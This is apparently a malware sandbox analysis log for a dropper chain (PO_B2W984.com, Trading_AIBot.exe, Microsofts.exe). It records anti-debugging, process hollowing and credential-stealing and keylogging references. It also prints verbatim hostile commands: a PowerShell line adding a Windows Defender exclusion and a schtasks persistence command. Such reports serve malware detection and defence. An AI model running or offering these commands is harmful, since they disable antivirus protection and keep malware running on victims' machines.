                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 4_1_004019F0 OleInitialize,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,SizeofResource,FreeResource,SizeofResource,LoadLibraryA,GetProcAddress,#8,#8,#8,#15,#23,#24,#16,#411,#9,#9,#9,4_1_004019F0
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifThread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9899Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeWindow / User API: threadDelayed 1920
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeWindow / User API: threadDelayed 788
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeWindow / User API: threadDelayed 7272
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_4-11938
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif TID: 4180Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 5400Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1420Thread sleep count: 9899 > 30Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4120Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif TID: 4128Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pif TID: 532Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 2832Thread sleep time: -115200000s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 2832Thread sleep time: -436320000s >= -30000s
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeLast function: Thread delayed
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DD58B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02DD58B4
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifThread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeThread delayed: delay time: 60000
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeThread delayed: delay time: 60000
                          Source: PO_B2W984.com, 00000000.00000002.22965692413.0000000000943000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@9
                          Source: PO_B2W984.com, 00000000.00000002.22965692413.000000000095A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: Microsofts.exe, 00000006.00000002.24170624386.0000000000F04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllSyst
                          Source: Oupzhkpr.PIF, 00000010.00000002.23142368522.0000000000789000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: Oupzhkpr.PIF, 0000000C.00000002.23062263204.00000000007BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~~
                          Source: C:\Users\user\Desktop\PO_B2W984.comAPI call chain: ExitProcess graph end nodegraph_0-25355
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFAPI call chain: ExitProcess graph end nodegraph_12-24472
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFAPI call chain: ExitProcess graph end node
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information queried: ProcessInformationJump to behavior

                          Anti Debugging

                          barindex
                          Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DEEBE8 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_02DEEBE8
                          Source: C:\Users\user\Desktop\PO_B2W984.comProcess queried: DebugPortJump to behavior
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess queried: DebugPort
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_052107C8 LdrInitializeThunk,LdrInitializeThunk,6_2_052107C8
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 4_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_1_0040CE09
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 4_1_004019F0 OleInitialize,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,SizeofResource,FreeResource,SizeofResource,LoadLibraryA,GetProcAddress,#8,#8,#8,#15,#23,#24,#16,#411,#9,#9,#9,4_1_004019F0
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DE8798 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02DE8798
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 4_1_0040ADB0 GetProcessHeap,HeapFree,4_1_0040ADB0
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess token adjusted: Debug
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 4_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_1_0040CE09
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 4_1_0040E61C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_1_0040E61C
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 4_1_00416F6A SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_1_00416F6A
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 4_1_004123F1 SetUnhandledExceptionFilter,4_1_004123F1
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_0040CE09
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_2_0040E61C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_0040E61C
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_2_00416F6A SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00416F6A
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_2_004123F1 SetUnhandledExceptionFilter,15_2_004123F1
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_1_0040CE09
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_1_0040E61C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_1_0040E61C
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_1_00416F6A SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_1_00416F6A
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_1_004123F1 SetUnhandledExceptionFilter,15_1_004123F1
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_0040CE09
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_0040E61C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_0040E61C
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_00416F6A SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00416F6A
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_004123F1 SetUnhandledExceptionFilter,19_2_004123F1
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_1_0040CE09
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_1_0040E61C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_1_0040E61C
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_1_00416F6A SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_1_00416F6A
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_1_004123F1 SetUnhandledExceptionFilter,19_1_004123F1
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          .NET source code references suspicious native API functions
                          Source: Microsofts.exe.4.dr, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                          Source: Microsofts.exe.4.dr, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                          Source: Microsofts.exe.4.dr, UltraSpeed.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                          Adds a directory exclusion to Windows Defender
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
                          Allocates memory in foreign processes
                          Source: C:\Users\user\Desktop\PO_B2W984.comMemory allocated: C:\Users\Public\Libraries\rpkhzpuO.pif base: 400000 protect: page execute and read and writeJump to behavior
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: C:\Users\Public\Libraries\rpkhzpuO.pif base: 400000 protect: page execute and read and write
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: C:\Users\Public\Libraries\rpkhzpuO.pif base: 400000 protect: page execute and read and write
                          Sample uses process hollowing technique
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection unmapped: C:\Users\Public\Libraries\rpkhzpuO.pif base address: 400000Jump to behavior
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection unmapped: C:\Users\Public\Libraries\rpkhzpuO.pif base address: 400000
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection unmapped: C:\Users\Public\Libraries\rpkhzpuO.pif base address: 400000
                          Writes to foreign memory regions
                          Source: C:\Users\user\Desktop\PO_B2W984.comMemory written: C:\Users\Public\Libraries\rpkhzpuO.pif base: 39A008Jump to behavior
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory written: C:\Users\Public\Libraries\rpkhzpuO.pif base: 241008
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory written: C:\Users\Public\Libraries\rpkhzpuO.pif base: 200008
                          Source: C:\Users\user\Desktop\PO_B2W984.comProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pifJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" Jump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess created: C:\Users\user\AppData\Local\Temp\Microsofts.exe "C:\Users\user\AppData\Local\Temp\Microsofts.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 20:52 /du 23:59 /sc daily /ri 1 /fJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" Jump to behavior
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02DD5A78
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: GetLocaleInfoA,0_2_02DDA790
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: GetLocaleInfoA,0_2_02DDA744
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02DD5B84
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: GetLocaleInfoA,4_1_00417A20
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,12_2_02E15A78
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: GetLocaleInfoA,12_2_02E1A790
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,12_2_02E15B83
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: GetLocaleInfoA,15_2_00417A20
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: GetLocaleInfoA,15_1_00417A20
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,16_2_02E25A78
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: GetLocaleInfoA,16_2_02E2A790
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,16_2_02E25B83
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: GetLocaleInfoA,19_2_00417A20
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: GetLocaleInfoA,19_1_00417A20
                          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Microsofts.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
